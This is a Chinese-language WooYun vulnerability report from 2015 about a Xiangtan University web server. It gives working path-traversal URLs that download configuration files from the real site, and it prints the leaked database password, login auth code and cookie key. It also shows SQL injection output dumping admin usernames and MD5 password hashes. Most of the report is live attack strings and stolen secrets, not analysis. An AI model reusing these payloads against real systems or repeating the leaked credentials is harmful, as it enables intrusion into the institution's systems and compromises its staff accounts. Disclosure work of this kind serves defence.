漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-099517
漏洞标题:湘潭大学某站漏洞集合
相关厂商:CCERT教育网应急响应组
漏洞作者: 小健客
提交时间:2015-03-05 11:25
修复时间:2015-03-10 11:26
公开时间:2015-03-10 11:26
漏洞类型:任意文件遍历/下载
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
任意文件下载+sql注入
详细说明:
首先是任意文件下载,例如下载网站配置文件
http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../e/config/config.php
http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../myphp/skc/skc_admin/config_base.php
//数据库配置信息
$ecms_config['db']['usedb']='mysql'; //数据库类型
$ecms_config['db']['dbver']='5.0'; //数据库版本
$ecms_config['db']['dbserver']='localhost'; //数据库登录地址
$ecms_config['db']['dbport']=''; //端口,不填为按默认
$ecms_config['db']['dbusername']='skc2014_cqy'; //数据库用户名
$ecms_config['db']['dbpassword']='TYJQbddT6PxddesWne@'; //数据库密码
$ecms_config['db']['dbname']='skc2014_data'; //数据库名
//后台安全设置
$ecms_config['esafe']['loginauth']='skc2014'; //登录认证码,如果设置登录需要输入此认证码才能通过
$ecms_config['esafe']['ecookiernd']='E85rF4YTN5jJeJMwCiz44Nj68v263H'; //后台登录COOKIE认证码(填写10~50个任意字符,最好多种字符组合)
然后是注入
http://skc.xtu.edu.cn/myphp/skc/php/viewart.php?artID=2581
xtuskc@localhost
[*] information_schema
[*] xtuskc
Database: xtuskc
[14 tables]
+------------------+
| dede_admin |
| dede_aera |
| dede_art |
| dede_arttype |
| dede_channeltype |
| dede_feedback |
| dede_flink |
| dede_flinktype |
| dede_guestbook |
| dede_member |
| dede_membertype |
| dede_partmode |
| dede_spec |
| dede_weburl |
+------------------+
Database: xtuskc
Table: dede_admin
[9 entries]
+----------------------------------+---------+
| pwd | uname |
+----------------------------------+---------+
| e3a59a6e4666d6d1104fe0e0bc1c4028 | admin |
| 7debc8eb445b974a0f6a9d6bdbd9be8d | yuwen |
| 202cb962ac59075b964b07152d234b70 | wxq |
| 523af537946b79c4f8369ed39ba78605 | admin1 |
| 202cb962ac59075b964b07152d234b70 | dongyi |
| b2789415adb1663ba54dd14aaa147b2c | hyp |
| 662948b54d5b7330b7ad1e5cd5d66dcd | <blank> |
| 93628d61e269f816a635d4870183457b | ych |
| 81dc9bdb52d04dc20036dbd8313ed055 | ws |
+----------------------------------+---------+
又来弱口令,后来网站打不开了,可能是维护关机了?所以没有截图。
发现主要是旧版网站存在问题,从而影响到新网站的安全
漏洞证明:
修复方案:
我不懂,你们看着办
版权声明:转载请注明来源 小健客@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-03-10 11:26
厂商回复:
最新状态:
暂无